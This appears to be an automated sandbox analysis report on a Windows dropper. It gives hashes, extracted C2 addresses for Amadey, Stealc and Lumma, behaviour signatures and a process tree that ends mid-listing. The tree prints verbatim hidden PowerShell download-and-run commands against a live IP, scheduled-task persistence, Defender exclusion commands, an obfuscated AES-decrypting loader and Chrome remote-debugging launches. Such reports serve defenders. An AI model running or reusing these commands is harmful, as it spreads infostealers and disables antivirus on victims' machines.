Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 11:47

General

  • Target

    4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe

  • Size

    5.5MB

  • MD5

    77a3c3d5bb1cfed2fe0f671b47587fea

  • SHA1

    5ffa631bc6c8039728bc242cb4b53f2537989c9a

  • SHA256

    4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070

  • SHA512

    2997dfe2b26208475847c03a174cc9d4e4739f82622c0120699558d7379fa567e5ba3f2d1e15c8b6132603aa945dc672c82dd627ece7d787a27975e901f89b42

  • SSDEEP

    98304:GPehuq4AturODM/4vpB5ziJ37OtmaQoZQva22GyASk6BZwEXzktR23/jqMhMGt:GPeh3mw7HziJLyZ2NTBCfwEXz2R23/jD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://timnelessdesign.cyou/api

https://paleboreei.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 33 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 11 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe
    "C:\Users\Admin\AppData\Local\Temp\4585d37c6262323774089a03884fd2848c8213bcdbe3ee1d3f2a0fde4ad9f070.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T0B39.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T0B39.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5044
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E00D7.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E00D7.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4648
          • C:\Users\Admin\AppData\Local\Temp\1075142001\801cdea59f.exe
            "C:\Users\Admin\AppData\Local\Temp\1075142001\801cdea59f.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4520
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn TlToamacLu3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2008
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn TlToamacLu3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:844
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\e3C4vfkK2.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3728
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:824
                • C:\Users\Admin\AppData\Local\Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE
                  "C:\Users\Admin\AppData\Local\Temp9SWTEXTCRKXZYVTSRLP6KJO1MZVR7W7C.EXE"
                  8⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2948
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4448
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075143021\am_no.cmd" any_word
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3500
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3560
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4484
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1700
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4288
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4368
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:844
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:676
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "Sgc6uma1Xa0" /tr "mshta \"C:\Temp\HxE5msDJc.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3424
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\HxE5msDJc.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:60
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:848
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3884
          • C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe
            "C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3644
            • C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe
              "C:\Users\Admin\AppData\Local\Temp\1075204001\bb18e0ec2c.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5116
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 960
              6⤵
              • Program crash
              PID:4124
          • C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe
            "C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2344
            • C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe
              "C:\Users\Admin\AppData\Local\Temp\1075205001\0817201e9c.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1800
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 948
              6⤵
              • Program crash
              PID:3644
          • C:\Users\Admin\AppData\Local\Temp\1075206001\7933a0043c.exe
            "C:\Users\Admin\AppData\Local\Temp\1075206001\7933a0043c.exe"
            5⤵
            • Downloads MZ/PE file
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2132
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1075208041\tYliuwV.ps1"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:400
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2408
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4512
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                7⤵
                • Blocklisted process makes network request
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2464
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1796
          • C:\Users\Admin\AppData\Local\Temp\1075209001\Bjkm5hE.exe
            "C:\Users\Admin\AppData\Local\Temp\1075209001\Bjkm5hE.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:3236
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              6⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:3816
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb7c10cc40,0x7ffb7c10cc4c,0x7ffb7c10cc58
                7⤵
                  PID:4644
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1920 /prefetch:2
                  7⤵
                    PID:2396
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1576,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2224 /prefetch:3
                    7⤵
                      PID:1680
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2512 /prefetch:8
                      7⤵
                        PID:4896
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3240 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:744
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3348,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3336 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:4724
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3704,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4560 /prefetch:1
                        7⤵
                        • Uses browser remote debugging
                        PID:5004
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4800 /prefetch:8
                        7⤵
                          PID:4156
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4836 /prefetch:8
                          7⤵
                            PID:4748
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4864 /prefetch:8
                            7⤵
                              PID:1552
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,4275545232211766378,10978999898566636865,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4884 /prefetch:8
                              7⤵
                                PID:1652
                          • C:\Users\Admin\AppData\Local\Temp\1075210001\WveK4j1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1075210001\WveK4j1.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:4924
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c cls
                              6⤵
                                PID:2788
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c cls
                                6⤵
                                  PID:2280
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c cls
                                  6⤵
                                    PID:3616
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c cls
                                    6⤵
                                      PID:1364
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c cls
                                      6⤵
                                        PID:3064
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cls
                                        6⤵
                                          PID:4640
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c cls
                                          6⤵
                                            PID:1440
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c cls
                                            6⤵
                                              PID:4596
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c cls
                                              6⤵
                                                PID:1044
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c cls
                                                6⤵
                                                  PID:2316
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c cls
                                                  6⤵
                                                    PID:4568
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c cls
                                                    6⤵
                                                      PID:3568
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c cls
                                                      6⤵
                                                        PID:5092
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\EKZAL'"
                                                        6⤵
                                                          PID:2344
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\EKZAL'"
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2988
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                          6⤵
                                                            PID:3600
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                              7⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3384
                                                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2l1630.exe
